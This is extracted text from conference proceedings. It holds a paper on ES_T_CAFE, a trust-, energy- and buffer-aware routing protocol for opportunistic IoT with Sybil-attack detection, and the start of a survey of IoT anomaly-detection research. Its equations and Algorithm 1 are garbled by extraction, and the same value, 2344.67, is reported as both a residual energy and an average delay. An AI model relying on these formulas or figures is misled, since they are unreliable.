Internet of Things [1] is a collection of Internet-connected devices, sensors, smart


phones, possessing ability for sharing and collection of data. IoT is omnipresent and
has a wide range of applications like health care, geographical location monitoring,
etc. A class of delay-tolerant networks is opportunistic networks [2] where the net-
work topology is dynamic and the messages are transmitted in a store-carry-forward
fashion. Opportunistic IoT [3] is based on the combined concepts of IoT and OppNets
where the humans are amid the IoT devices. The wide spectrum of OppIoT devices
and broadcast mode of data sharing pose a threat to security of data and privacy of
the users [4]. In addition to this, designing an efficient secure routing approach is the
need of the hour as the devices have limited storage and battery capacity. The success
of a secure routing approach is dependent on how efficiently it manages space and
energy.
Traditional approaches of data encryption [5] are not able to address the attacks
efficiently as they require availability of the network continuously and fail to handle
attackers present inside the network. Another issue with these approaches is the
sharing and management of keys. This requires devising trust-based strategies[6].
Trust represents the faith of a node on others about their future behavior in the
network.
This paper proposes an efficient version of T_CAFE which is a secure trust-based
routing approach for OppIoT [7]. The next hop selection is based on hop’s current
energy level, its residual buffer and the trust value. Trust is calculated by taking
a weighted average of direct trust and indirect trust value. This scheme provides
defense against Sybil attack [8]. Sybil attacker generates multiple forged identities
on a device concurrently for obstructing the correct operation of the network. Sybils
try to raise their own trust and reduce the trust of other nodes in the network. The
major contributions of this work include
• Energy-aware next hop selection: The next hop is selected such that it has higher
residual energy than the carrier node. If a node has sufficient battery power, then
only the chances of it delivering a packet to the destination are higher.
• Space-efficient forwarding decision: A packet is forwarded to the neighboring
node if it has sufficient buffer to hold the packet, and its residual space is higher
than the carrier node. Higher residual space implies that the chances of a packet
getting dropped are low.
• Trust-based security: A reputation system is designed based on the trust values
of the nodes. Packets are forwarded to nodes with higher trust values.
• Detection and isolation of Sybil attackers: The proposed approach successfully
isolates attackers from the process of packet transmission.
This paper is arranged as follows. A survey of the literature work in the field
of security of OppIoT is given in Sect. 2. Section 3 provides the details of the pro-
posed ES_T_CAFE. Simulation results are discussed in Sect. 4. Section 5 gives a
brief conclusion of the work.
An Energy- and Space-Efficient Trust-Based Secure … 129

2 Related Work

In this section, existing works related to the energy and security of OppIoT networks
are discussed.
Gao et al. [9] presented a routing protocol that is efficient in terms of energy, and
the forwarding decision is based on speed and residual energy of a node for preventing
unnecessary accumulation of data and uncontrolled spraying. The protocol utilizes
energy efficiently. However, the protocol assumes a sink node that possesses unlim-
ited memory, power and computation capacity, which is unrealistic. It is based on the
assumption that all nodes have equal communication range which is not possible in
real scenarios. Chilipirea et al. [10] proposed an energy-aware extension of BUBBLE
Rap routing protocol for opportunistic networks that combined energy optimization
with socially aware routing for balancing the energy consumption. A node with high
social importance was ranked higher and chosen for routing which led to its energy
getting drained. Thus, this protocol added the updated utility function such that its
value decreases if a node has lower energy value. This led to a reduction in the nodes
probability of acting as a successful carrier of message. This approach did not address
the security issues. Duan et al. [11] proposed a game theoretic risk strategy model for
determining the trust of nodes in the network. Using Nash equilibrium, probability
of the selected strategy was calculated. The energy cost was considered to be pro-
portional to the trust. The system used watchdog mechanism which added overhead
to the system. Each node makes a trust request to which the neighbors respond with
recommendations, and this adds too much overhead and thus wastes energy which is
contradictory to the energy saving goal. SOA-based security protocol was given by
Chen et al. [6] where the trust is computed using collaborative filtering of feedback
based on social contacts, interest relationships community and similarity rating of
friendship. Sharma et al. [12] proposed a secure defense against blackhole and grey-
hole attacks based on history data. It made predictions about behavior considering
the average time for forwarding.
M. Bala Krishna proposed a secure opportunistic technique for message trans-
mission based on hashing called DASHOP for IoT network [13] based on trust. The
base stations were assumed to be trusted for coordinating with other nodes. Keys
are generated using the elliptic curve digital signature algorithm. The computation
intensive elliptic curve digital signature approach was used, and the limited power of
the nodes was not taken into consideration. Dhurandher et al.[14] proposed a trust-
and cryptography-based security approach. This scheme made lots of computations
and assumed too much infrastructure. Borah et al. [15] presented ELPFR-MC, a
location predicting protocol that is energy aware and makes routing decision based
on current energy level of a node and its probability of message delivery to the des-
tination. This is an energy-aware protocol, and security is not implemented while
performing message routing. RSA-based secure routing protocol was proposed by
Kandhoul et al.[16] for OppIoT. This scheme used RSA for message encryption and
detected packet fabrication attack. The efficiency of the routing protocol was not
considered.
130 N. Kandhoul and S. K. Dhurandher

3 Proposed ES_T_CAFE Protocol

This section elaborates the proposed ES_T_CAFE protocol.

3.1 Motivation

OppIoT is assumed to be comprising a wide range of devices like small sensors, power
limited devices and so on. The devices are constrained in terms of storage and battery.
In addition to limited power and space, another challenge is the secure transmission
of data as in OppIoT, and the data is broadcasted to neighbors revealing the data to
attackers as well. Thus, the current scenario calls for a design of secure techniques for
sharing data that are energy and space efficient. The work in literature has not given
much importance to limited space and power. T_CAFE is a trust-based protocol that
protects the network from several attacks. But it does not consider the constrained
energy and storage of the devices involved in the network. The malicious nodes waste
the storage by sending fake messages and drain the energy resources of the nodes by
engaging them in unnecessary packet forwarding. This has motivated us in designing
an energy- and space-efficient version of T_CAFE called as ES_T_CAFE.

3.2 Proposed Protocol

ES_T_CAFE considers that all the member nodes of OppIoT cooperate with one
another for message transmission. It is also assumed that the nodes have sufficient
buffer capacity for storing their context information. Some of the nodes behave
maliciously and execute Sybil attack in the network.
Each node maintains a table of already detected malicious hosts. Upon encounter
with a node, the carrier node checks if the node is malicious. If yes, it waits for some
other node. If the node is benign, it checks its residual buffer space and energy. If
the node does not have sufficient space, the chances of a packet getting dropped are
high. Similarly, if the power is low, the node might not be able to sustain the packet
forwarding procedure, thus reducing the packet delivery probability. The residual
energy is normalized as follows:

get_curr ent_Energy()
Residual_Energycarrier = (1)
get_intial_energy()

Similarly, the residual buffer space for the carrier is calculated as

get_Fr ee_Bu f f er _Si ze()


Residual_Bu f f ercarrier = (2)
get_Bu f f er _Si ze()
An Energy- and Space-Efficient Trust-Based Secure … 131

The normalization performed above is necessary to bring the values in the range of
0 to 1. Finally, ES parameter is computed as

E Scarrier = (α ∗ Residual_Energy + β ∗ Residual_Bu f f er ) (3)

where α + β = 1. α and β parameters are used to control the weightage given to


energy and space parameters. The E S_T hr eshold is computed by taking an average
of ES value of all the neighbors of carrier as

n=1
n
E Snode
E S_T hr eshold = (4)
count
If the E Snode is greater than E S_T hr eshold, the next step is to compare its trust.
The trust is computed as a sum total of direct trust, computed as a sum of social
behavior and indirect trust values, computed on basis of recommendation received
from neighboring nodes. The details regarding trust computation have already been
given in [7]. If any two neighbors are similar to one another beyond a threshold,
they are said to be performing Sybil attack. The attackers thus detected are added
to malicious table, thus identifying the Sybil nodes and successfully secluding them
from participation in the packet transmission. If a neighbor possesses high trust value,
the message is forwarded to it, else the carrier waits for a better message forwarder.
The entire routing process is described in Algorithm 1.

4 Performance Evaluation

Opportunistic network environment(ONE) [17] is used for simulating proposed


ES_T_CAFE protocol. Real data traces cambridge/haggle/imote[18] of INFOCOM
2006 are used for simulation purpose. This dataset has four traces of Bluetooth
sightings of 98 users possessing iMote devices for 337418 s. The performance of
ES_T_CAFE is evaluated and compared with the results for T_CAFE and ELPFR-
MC protocol, under varying buffer size, time to live and interval of message gener-
ation. The simulation specifications are provided in Table 1. The TTL of messages
is set as 100 min. Every simulation is executed for 337418 s. 500 Kb- 1 Mb sized
message is created every 25–35 seconds.
Firstly, the buffer size is varied, and its impact is noted on simulation metrics
as shown in Figs. 1, 2, 3 and 4. The impact of varying buffer size is noted on
delivery probability in Fig. 1. With increasing buffer size, the delivery probabil-
ity also increases as there are lesser chances of packets getting dropped with higher
buffer size. This is also the reason for reduction in count of messages dropped with
increased buffer as shown in Fig. 3. The average probability of message delivery for
ES_T_CAFE is 0.41 that is 5.4% higher than T_CAFE and 18% higher than ELPFR-
MC. The average count of dropped packets for ES_T_CAFE is 10.8% lower than
T_CAFE and 21% lower as compared to ELPFR-MC.
132 N. Kandhoul and S. K. Dhurandher

Algorithm 1 : ES_T_CAFE
1: Begin 22: Calculate the correctly delivered packet’s
2: Initialize Trust = 0.5 for every node. ratio:
3: For present situation, node A is considered as
Corr ect_Packets_For war ded A,B
the Trustor and B is assumed to be Trustee. CoP R AB = T otal_Packets_Recieved B
4: if (Malicious_table.contains K ey(B)) then
5: continue; wait for benign node. 23: Calculate the Direct Trust:
6: else
7: Compute Residual E nergy as: Dir ect_T r ust A,B = θ ∗ CoP R + δ ∗
Residual _ Energy B = get_curr ent_Energy()
get_intial_energy() Amb + γ ∗ Fw R + λ ∗ Enc R
8: Compute Residual B u f f er as:
Residual _ Bu f f er B = get_Fr ee_Bu f f er _Si ze()
get_Bu f f er _Si ze() where θ, δ, γ , λ are constants where the
9: Compute ES as: sum of these equals 1.
E S B = (α ∗ Residual_Energy + β ∗ 24: end for
Residual_Bu f f er ) 25: end if
10: end if 26: A takes recommendations regarding B from
11: Compute E S_T hr eshold as: neighbors.
n
node ES 27: if (count (r ecomdtn) = 0) then
E S_T hr eshold = n=1 count
12: if ( E S_B < E S_T hr eshold) then 28: Aging of the direct trust is performed:
13: continue; wait for a better carrier.
Dt _T r ust (t) A,B = e−φt Dir ect _T r ust (t − 1)
14: else
15: for every neighbor(N eigh i ) of A do Dir ect_T r ust A,B = Dt_T r ust (t) A,B
16: Calculate the packet forwarding ratio: 29: else
30: if (Malicious_table.containsKey(N eigh i ))
n then
Fw R AB = n A,B B
T otal 31: Encountered node is malicious .
17: Compute amiability as:
f +f continue;
Fr eq AB = f A,BA+ f B,D B 32: else
T otal T otal
d +d 33: Calculate Indirect Trust of A on B:
Dur AB = d A,BA+d B,D B
T otal T otal N
Dir ect_T r ust N eigh i B
r +r I ndir ect_T r ust A,B = i=0
N
Rec AB = r A,BA+r B,D B
T otal T otal
34: end if
Amb = Fr eq + Dur + Rec 35: end if
36: Calculate the total Trust:
18: Calculate encounter ratio with respect to
destination D: T r ust A,B = σ ∗ Dir ect_T r ust A,B + ω ∗
c B,D I ndir ect_T r ust A,B
Enc R B D = c
T otal B
37: if (T r ust A,B > T r ust A ) then
19: if ((Amb + Enc R) > Sybil_thr eshold) 38: Send the packet to B.
then 39: else
20: Add N eigh i to malicious_table as a 40: Wait until a better carrier is encountered.
Mal_Sybil node. 41: end if
21: end if
An Energy- and Space-Efficient Trust-Based Secure … 133

Table 1 Specifications for simulation


Specification Value
Simulation area 1000 mt.*1000 mt.
Transmission range 10 m
Power of transmission 15 db
Buffer size 100 MB
Response scanning energy 0.08 J
Model for movement stationary movement
Device type Imote
Duration 337,418 s or 3.91 d
Energy of transmission 0.5 J
Contact count 170,601
Energy for scanning 0.06 J
Coefficient of charging 20 J
Base energy 0.07 J

0.5
0.45
0.4
Delivery Probability

0.35
0.3
0.25 ELPFR-MC
0.2 T_CAFE
0.15
ES_T_CAFE
0.1
0.05
0
5 10 15 20 25
Buffer Size (MB)

Fig. 1 Delivery probability versus buffer size

Figure 2 shows the impact of increasing buffer size on residual energy level of
a node at the completion of simulation. As the buffer size is increased, there are
lesser chances of a packet getting dropped, thereby saving node’s energy. Thus, with
increasing buffer size, the leftover energy of a node also increases. The average value
of leftover energy for ES_T_CAFE is 2344.67 J which is 11% higher than T_CAFE
and 38% higher than ELPFR-MC. The impact of varying buffer on average latency is
shown in Fig. 4. With increasing buffer size, the latency increases as the packet spends
more time in the buffer. The average delay in delivering packets for ES_T_CAFE is
observed to be 2344.67 s.
134 N. Kandhoul and S. K. Dhurandher

35000

Node's residual energy (Joules)


30000

25000

20000
ELPFR-MC
15000
T_CAFE
10000 ES_T_CAFE
5000

0
5 10 15 20 25
Buffer Size (MB)

Fig. 2 Node’s residual energy versus buffer size

6000

5000
Messages Dropped

4000

3000 ELPFR-MC
T_CAFE
2000
ES_T_CAFE
1000

0
5 10 15 20 25
Buffer Size (MB)

Fig. 3 Messages dropped versus buffer size

5000
4500
Average Latency (sec)

4000
3500
3000
2500 ELPFR-MC
2000 T_CAFE
1500
ES_T_CAFE
1000
500
0
5 10 15 20 25
Buffer Size (MB)

Fig. 4 Average latency versus buffer size


An Energy- and Space-Efficient Trust-Based Secure … 135

0.45
0.4
0.35
Delivery Probability 0.3
0.25
ELPFR-MC
0.2
T_CAFE
0.15
0.1 ES_T_CAFE

0.05
0
5 10 15 20 25
TTL ( Minutes)

Fig. 5 Delivery probability versus TTL

40000
Node's residual energy (Joules)

35000
30000
25000
20000 ELPFR-MC
15000 T_CAFE

10000 ES_T_CAFE
5000
0
5 10 15 20 25

TTL ( Minutes)

Fig. 6 Node’s residual energy versus TTL

The effect of changing the packet’s time to live is then observed on simulation
metrics as shown in Figs. 5, 6, 7 and 8. Figure 5 shows that raising the value of
message TTL results in a drop in probability of message delivery. This is due to the
fact that the buffer is more occupied with increased message TTL as the messages
tend to live longer, thus raising the probability of messages getting dropped. The
average probability for message delivery for ES_T_CAFE is 0.3934, which is 8.42%
better as compared to T_CAFE and and 18% higher than ELPFR-MC. The residual
energy at the end of simulation drops with enhancing TTL as shown in Fig. 6. As the
messages are spending longer time in buffer, the node’s energy is wasted in dropping
them later on for freeing the buffer. The average residual energy for ES_T_CAFE is
30261.51 J which is the highest.
From Fig. 7, it can be observed that the count of packets getting dropped is increas-
ing with growing TTL. The messages stay in buffer for a larger period of time, enhanc-
ing its chances of getting dropped as depicted in Fig. 5. The average count of dropped
136 N. Kandhoul and S. K. Dhurandher

7000

6000

Messages Dropped
5000

4000
ELPFR-MC
3000
T_CAFE
2000 ES_T_CAFE
1000

0
100 150 200 250 300
TTL ( Minutes)

Fig. 7 Messages dropped versus TTL

8000
7000
Average Latency (sec)

6000
5000
4000 ELPFR-MC
3000 T_CAFE
2000 ES_T_CAFE
1000
0
5 10 15 20 25
TTL ( Minutes)

Fig. 8 Average latency versus TTL

messages for ES_T_CAFE is 5.42% lower than T_CAFE and and 9.1% lower than
ELPFR-MC. The average delay in packet delivery is increased with enhancing TTL.
Figure 8 demonstrates that the observed delay for ES_T_CAFE is around 3414.97 s.

5 Conclusion

An energy- and space-efficient secure routing protocol for OppIoT (called ES_T_
CAFE) is proposed in this paper. ES_T_CAFE depends on the node’s leftover energy,
free buffer size and trust-based probability of packet delivery for making message
forwarding decisions. Including the parameters of space and energy enhances the
efficiency of routing protocols as the devices involved are usually constrained in terms
of storage space and battery capacity. Simulation results prove that ES_T_CAFE
outperforms T_CAFE and ELPFR-MC in terms of node’s residual energy, messages
dropped, message delivery probability and average latency. In future, the authors
plan to investigate the impact of message encryption on the proposed scheme.
An Energy- and Space-Efficient Trust-Based Secure … 137

References

1. Atzori, L., Iera, A., & Morabito, G. (2010). The internet of things: A survey. Computer Net-
works, 54(15), 2787–2805.
2. Pelusi, L., Passarella, A., & Conti, M. (2006). Opportunistic networking: Data forwarding in
disconnected mobile ad hoc networks. IEEE Communications Magazine, 44(11), 134–141.
3. Guo, B., Zhang, D., Wang, Z., Yu, Z., & Zhou, X. (2013). Opportunistic IoT: Exploring the
harmonious interaction between human and the internet of things. Journal of Network and
Computer Applications, 36(6), 1531–1539.
4. Sicari, S., Rizzardi, A., Grieco, L. A., & Coen-Porisini, A. (2015). Security, privacy and trust
in internet of things: The road ahead. Computer Networks, 76, 146–164.
5. Wu, Y., Zhao, Y., Riguidel, M., Wang, G., & Yi, P. (2015). Security and trust management in
opportunistic networks: A survey. Security and Communication Networks, 8(9), 1812–1827.
6. Chen, R., Guo, J., & Bao, F. (2016). Trust management for SOA-based IoT and its application
to service composition. IEEE Transactions on Services Computing, 9(3), 482–495.
7. Kandhoul, N., Dhurandher, S. K., & Woungang, I. (2019). T X X S L AHU N D X XC AF E : A
trust based security approach for opportunistic IOT. In IET Communications.
8. Dhakne, A. R., & Chatur, P. N. (2017). Detailed survey on attacks in wireless sensor network.
In Proceedings of the International Conference on Data Engineering and Communication
Technology (pp. 319–331). Springer.
9. Gao, S., Zhang, L., & Zhang, H. (2010). Energy-aware spray and wait routing in mobile
opportunistic sensor networks. In 2010 3rd IEEE Intl. Conference on Broadband Network and
Multimedia Technology (pp. 1058–1063). IEEE.
10. Chilipirea, C., Petre, A.-C., & Dobre, C. (2013). Energy-aware social-based routing in oppor-
tunistic networks. In 2013 27th International Conference on Advanced Information Networking
and Applications Workshops (pp. 791–796). IEEE.
11. Duan, J., Gao, D., Yang, D., Foh, C. H., & Chen, H.-H. (2014). An energy-aware trust derivation
scheme with game theoretic approach in wireless sensor networks for IoT applications. IEEE
Internet of Things, 1(1), 58–69.
12. Sharma, D. K., Dhurandher, S. K., Woungang, I., Arora, J., & Gupta, K. (2016). History-based
secure routing protocol to detect blackhole and greyhole attacks in opportunistic networks. In
Recent Advances in Communications and Networking Technology (Vol. 5, No. 2, pp. 73–89).
13. Krishna, M. B., & Lorenz, P. (2017). Delay aware secure hashing for opportunistic message
forwarding in internet of things. In Globecom Workshops, 1–6. IEEE.
14. Dhurandher, S. K., Kumar, A., & Obaidat, M. S. (2017). Cryptography-based misbehaviour
detection and trust control mechanism for opportunistic network systems. IEEE Systems Jour-
nal, 12(4), 3191–3202.
15. Borah, S. J., Dhurandher, S. K., Woungang, I., Kandhoul, N., & Rodrigues, J. J. C. (2018). An
energy-efficient location prediction-based forwarding scheme for opportunistic networks. In
IEEE ICC, 1–6.
16. Kandhoul, N., & Dhurandher, S. K. (2019). An asymmetric RSA based security approach for
opportunistic IoT. In WIDECOM (pp. 47–60). Milan, Italy: Springer.
17. Keränen, A., Ott, J., & Kärkkäinen, T. (2009). The one simulator for DTN protocol evaluation.
In Proc. of the 2nd International Conference on Simulation Tools and Techniques (pp. 1–10).
Institute for Computer Sciences, Social-Informatics and Telecommunications Engineering.
18. Crawdad haggle dataset. https://crawdad.org/uoi/haggle/20160828/one. Accessed: 2019-10-
18.
A Survey on Anomaly Detection
Techniques in IoT

Priya Sharma and Sanjay Kumar Sharma

Abstract When small every day ‘things’ or objects are augmented with computing
capabilities, and a connection is created between them, it makes a network of Internet
of things (IoT) devices. Since the IoT devices have reached the home users as well, it
has become crucial to maintain the integrity of these devices and prevent any unethical
mis happening under the name of security flaws. Many researchers have proposed
several techniques for such causes, from understanding propagation behavior and
influential factors to develop frameworks like software-defined anything (SDx) in
order to detect and mitigate security attacks in the IoT devices. In this paper, a survey
of such techniques is presented, which has been published in the decade of 2010 to
2020, with a focus on recent publications and a comparison study of all the mentioned
sources. The aim of this survey is to motivate the researcher in the area of IoT and
its security and understand what the current trend is and what the future holds for
development in the area.

Keywords Internet of Things · IoT · Anomaly detection · Cyber Security ·


Machine learning · Optimization

1 Introduction

The era of Internet of Things (IoT) has come forth; every little item in the household is
being converted to a digital alternative, every item is being equipped with a processor,
these items are getting connected to each other, performing in sync, and providing
ease to the humankind. Internet offers global communication worldwide; hence,
all of these devices can be accessed from anywhere in the world. The technology
behind IoT has been growing at a swift pace for the past decade, but recently, with
the advancement in technology and faster communication with efficient bandwidth
control, the pool of IoT devices has seen a burst in growth [1]. With an estimate
of twenty-two billion IoT devices currently connected to the Internet, which is only

P. Sharma (B) · S. K. Sharma


School of Information and Communication Technology, Gautam Buddha University, Greater
Noida, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 139
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_11
140 P. Sharma and S. K. Sharma

going to increase as time passes, and is expected to pass the fifty billion mark in 2030
[2].
IoT devices can be majorly defined under three categories,
a. Big Things,
Big Things do not mean big in size, but in the complexity of their design and
how these things work. For instance, a tele company manages their big IoT
devices, like base stations, mobile station controllers, etc., all of these devices
are connected to power outlets. They are connected to internet as well, without
the need for bandwidth control, and there are thousands of parameters to be
controlled in this scenario.
b. Small Things,
Small IoT devices are the small simpler things in terms of complexity that are
being used every day by the average and are connected to the internet. This
category contains mostly sensors and small devices that can run on battery
power and are supposed to have efficient bandwidth control as most of the time;
these devices use a subscriber identity module or a SIM card. [3] For instance,
a smart bulb or tube light at home, these kinds of devices follow the set and gate
rule and do not have thousands of parameters to work on.
c. Non-IP things,
These are the things that are called IoT, but are not really IoT, because they are
not connected to the internet. These are things like ZigBee, Z-Wave, and BLE,
all of these are IoT protocols, but are not using the internet, but they become
IoT devices with the help of a gateway. It adds a layer of complexity, but it is
still much lesser than the big things’. The data model is just as simple as the
small things.
As internet applications are growing day-by-day, their security against intrusion
has been becoming a significant issue [4]. IoT devices have not been glorious in terms
of security. IoT devices have to face certain challenges when it comes to security;
as they are heterogeneous devices, it becomes complex to form a secure mechanism
that can be implemented by all of the devices; instead, all individual devices require
a unique security mechanism. The second challenge comes from the very advantage
of IoT devices itself, i.e., the interconnectivity; since all of the devices are connected
with each other, if one of them gets compromised, it is relatively easy to intrude other
devices as well.
As the world is moving forward with the implementation of smart cities and
interconnected devices, correct maintenance practices [5]. The security mechanisms
have become a crucial part of the research for such devices, and therefore, a secure
IoT infrastructure should be created which will provide security from all of the
cybercrimes and protect the vulnerabilities of the devices, as in a smart city, data is
of utmost value, even more than money; therefore, the IoT security infrastructure
should be built in such a way that even if it gets compromised, it has the ability to
recover back, and for such purposes, several techniques have been exploited, and in
this paper, a survey of all of these techniques has been presented. The key aspect of
A Survey on Anomaly Detection Techniques in IoT 141

this paper is that making the realization that anomaly detection has provided more
protection than other machine learning-based techniques in terms of IoT security.

1.1 Anomaly Detection

The anomaly based technique follows an item’s behavior; the observations made
on the behavior of an item/object are recorded and learned. If for any reason, a
change is observed in the behavior of the item/object, it is marked as an anomaly or
a deviation, which are not supposed to be in the system and are hence used as an
alarming situation. Hence, it is also known as profile-based detection technique. The
anomaly based detection technique detects these unknown patterns and reports them
[6].
As Fig. 1 mentions, the requests from the devices are analyzed at the server level,
and when the service request is detected as an outlier/Ab-Normal request, the request
is declined and an alarm is sent to the administrator. The flow chart of the working
of anomaly detection is mentioned below in Fig. 2.

Fig. 1 Anomaly detection [6]


142 P. Sharma and S. K. Sharma

Fig. 2 Flow chart of anomaly detection [7]

This paper is arranged systematically as follows: Related work has been described
in Sect. 2. Section 3 formulates a comparison in which analysis of the various machine
learning algorithms have been described. Finally, the conclusion of algorithms has
been described in Sect. 4.

2 Literature Review

In this section, some of the research work done in the IoT security area has been
reviewed, the aim of this survey is to motivate the researcher in the area of IoT and
its security, and understand what the current trend is and what the future holds for
development in the area.
In the research done by Hasan et al. [8], they have used various machine learning
techniques like logistic regression (LR), support vector machine (SVM), decision
tree (DT), random forest (RF), and artificial neural network (ANN), and performed
analysis of their accuracy in terms of secure infrastructure for IoT devices. For each
of the techniques, they have reached more than 98% accuracy.
Liu et al. [9], proposed a state of detection based on ‘ON’ and ‘OFF’, which
means that a malicious attack can be performed on an IoT device, while during the
IoT device is in its sleep mode. They also noticed that after getting attacked, they
A Survey on Anomaly Detection Techniques in IoT 143

do not change their work and perform the same tasks in an ordinary manner, so it is
challenging to detect compromised devices.
Diro et al. [10], proposed a fog-to-things architecture, which is based on deep and
shallow neural networks, and they performed their experiment on an open-source
database. Their experiment was based on detecting anomalies for the four test classes,
and they achieved 98.27% accuracy in their deep neural network model and 96.75%
accuracy in their shallow neural network model.
Hodo et al. [11], performed a threat analysis using an artificial neural network
(ANN), the main focus of the analysis performed by them was to classify normal and
threat patterns in an IoT network. They performed their experiment in a simulated
IoT environment, and achieved an accuracy of 99.4%, and they verified the fact that
IoT based on ANNs can successfully detect DDoS/DoS attacks.
Pacheco et al. [12], proposed a framework for threat analysis made up of four
different layers, devices, network, service, and application layer. Their experiment
claims to identify potential attacks and provide a method of mitigation from the
compromised system and perform full recovery. Their classification model reached
an accuracy of 98% for known attacks and 97.4% for unknown attacks.
Golomb et al. [13], proposed a new framework, CIoTA: Collaborative IoT
anomaly detection via blockchain. This framework is based on the concept of
blockchain, which allows it to perform distributed anomaly detection. Their exper-
iment was performed in a simulated environment, and the overhead of their system
reached only upto 6.5% and was able to withstand all of the exploitation experiments
performed on it.
Alrashdi et al. [14], worked on the problem of security issues in smart city IoT
devices, and proposed an anomaly based random forest classifier to detect compro-
mised IoT devices at distributed fog nodes. Their experiment achieved an accuracy
rate of 99.34%.
Garg et al. [15], performed analysis on a clustering technique used in IoT devices,
which is density-based spatial clustering of applications with noise, i.e., DBSCAN,
which is used to detect anomalies, however, they discovered that DBSCAN suffers
from two issues, parameter selection, and finding the correct nearest neighbor. They
provided a multi-stage model using the Boruta algorithm in order to capture the set
with the most relevancy, and firefly algorithm, in order to correctly find the centroid.
Their experiment yielded an accuracy of 96.23%.
Luo and Nagarajan [16], introduced auto-encoder neural networks into the wire-
less sensor networks (WSNs) in order to solve the issue of elusive nature of anoma-
lies and the volatility present in ambient environments. Their experiment reduced
the overhead and the computational load by moving this task from the IoT device to
the cloud itself. They achieved higher accuracy with lower false positive rates than
their existing counterparts. Their experiment also claims to be adaptive to the new
changes made in the network.
Nguyen et al. [17], presented a new framework for IoT security, named as DÏoT,
which is an autonomous self-learning distributed system, which can be used to detect
compromised IoT devices in a network. This framework does not require human inter-
vention and is able to successfully detect anomalies caused by malicious adversaries.
144 P. Sharma and S. K. Sharma

It employs a federated learning approach, and is able to adapt to new and unknown
attacks. Their experiment yielded a high-accuracy rate of 95.6% with no false alarms
in the real world situation.

3 Analysis of Literature Work

Data can be collected from various sources, and can be mined as well, but knowl-
edge discovery does not yield enough results to help make a controlling action.
This is where anomaly detection comes into the picture, IoT sensors can detect rich
information, this additional information provides enough data to classify the action as
anomalous or normal [18, 19]. In this section, the literature review has been compared
in Table 1, and empirical analysis has been provided afterward.
It has been found out that most of the research done in the area of security improve-
ment using anomaly detection in IoT devices is based on machine learning algorithms
and their various classifiers, and the most influential application is ‘Smart Cities.’
The selections of the research paper have been from the year 2014–2020. The tech-
nical insight has been reviewed in Sect. 2 in order to have an impact on the reader for
this field of research. The above comparison can provide the reader with the details
of techniques that are actively being improved for anomaly detection in IoT devices,
and then, it can make a learned decision of where the energy should be invested
in order to overcome the existing challenges. Considering the potential applications

Table 1 Summary of literature review


# Author Technique Application Evaluation Accuracy rate
area scheme
1 Hasan et al. [8] ML algorithms Smart cities Accuracy 98%
2 Liu et al. [9] Set/gate Smart cities Error rate –
3 Diro et al. [10] Neural network Smart cities Accuracy 98.27%
4 Hodo et al. [11] Artificial neural Network Accuracy 99.4%
network
5 Pacheco et al. Threat analysis Network Accuracy 97.4%
[12]
6 Golomb et al. CIoTA or Smart cities Overhead <6.5%
[13] blockchain
7 Alrashdi et al. Random forest Smart cities Accuracy 99.34%
[14]
8 Garg et al. [15] DBSCAN Network Accuracy 96.23%
9 Luo and Neural networks Ambient Error rate –
Nagarajan [16] environments
10 Nguyen et al. DÏoT Network Accuracy 95.6%
[17]
A Survey on Anomaly Detection Techniques in IoT 145

of IoT devices in future, it is a crucial requirement to not only make such highly
secure frameworks for the upcoming IoT devices but also make advancements so
that the current generation of IoT devices can be upgraded without requiring the user
to remove the devices from the network for a considerable amount of time.

4 Conclusion

As the IoT devices have seen a burst in the growth of both creation and usage, it has
become a crucial requirement to maintain the integrity of these devices and prevent
any unethical mis happening under the name of security flaws. According to some
researchers, securing the IoT devices’ access points and addressing the weaknesses
would be able to solve the problem, but IoT devices need to be secured as whole units
and should be able to recover from a compromised situation. For that purpose, in this
paper, a survey of such techniques is presented, with a comparison study of all the
mentioned sources. The aim of this survey is to motivate the researcher in the area
of IoT and its security and understand what the current trend is and what the future
holds for development in the area. As it has been analyzed, the security enhance-
ments are being done with the help of machine learning techniques to improve the
anomaly detection of IoT devices as the sensors present in IoT devices capture rich
information, useful enough to make a correct classification of normal or anomalous
behavior. Future application in this area could be to make such adjustments in the
security infrastructure that even if the attacker learns the sensor information and
gains enough access to launch a replay attack, the IoT device is able to mitigate and
recover successfully. This situation might be solved with the help of MTD strategy,
making it very difficult to perform analysis on the IoT device’s database.

References

1. Lueth, K. L. (2014). Why the internet of things is called internet of things: Definition, history,
disambiguation. IoT Analytics, 19.
2. shorturl.at/stPX2 accessed on 26th Dec 2020
3. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement, 150, 107077.
4. Singh Bhati, N., Khari, M., Garcia-Diaz, V., & Verdu, E. (2020). A review on intrusion detection
systems and techniques. International Journal of Uncertainty, Fuzziness and Knowledge-Based
Systems.
5. Bhati, B. S., & Rai, C. S. (2020). Ensemble based approach for intrusion detection using extra
tree classifier. Intelligent computing in engineering (pp. 213–220). Singapore: Springer.
6. Bhati, B. S., Chugh, G., Al-Turjman, F., & Bhati, N. S. (2020). An improved ensemble based
intrusion detection technique using XGBoost. Transactions on Emerging Telecommunications
Technologies, e4076.
7. Gurina, A., & Eliseev, V. (2019). Anomaly-based method for detecting multiple classes of
network attacks. Information, 10(3), 84.
146 P. Sharma and S. K. Sharma

8. Hasan, M., Islam, M. M., Zarif, M. I. I., & Hashem, M. M. A. (2019). Attack and anomaly
detection in IoT sensors in IoT sites using machine learning approaches. Internet of Things, 7,
100059.
9. Liu, X., Liu, Y., Liu, A., & Yang, L. T. (2018). Defending ON–OFF attacks using light
probing messages in smart sensors for industrial communication systems. IEEE Transactions
on Industrial Informatics, 14(9), 3801–3811.
10. Diro, A. A., & Chilamkurti, N. (2018). Distributed attack detection scheme using deep learning
approach for internet of things. Future Generation Computer Systems, 82, 761–768.
11. Hodo, E., Bellekens, X., Hamilton, A., Dubouilh, P. L., Iorkyase, E., Tachtatzis, C., & Atkinson,
R. (2016). Threat analysis of IoT networks using artificial neural network intrusion detec-
tion system. In 2016 International Symposium on Networks, Computers and Communications
(ISNCC) (pp. 1–6). IEEE.
12. Pacheco, J., & Hariri, S. (2018). Anomaly behavior analysis for IoT sensors. Transactions on
Emerging Telecommunications Technologies, 29(4), e3188.
13. Golomb, T., Mirsky, Y., & Elovici, Y. (2018). CIoTA: collaborative IoT anomaly detection via
blockchain. arXiv preprint arXiv:1803.03807.
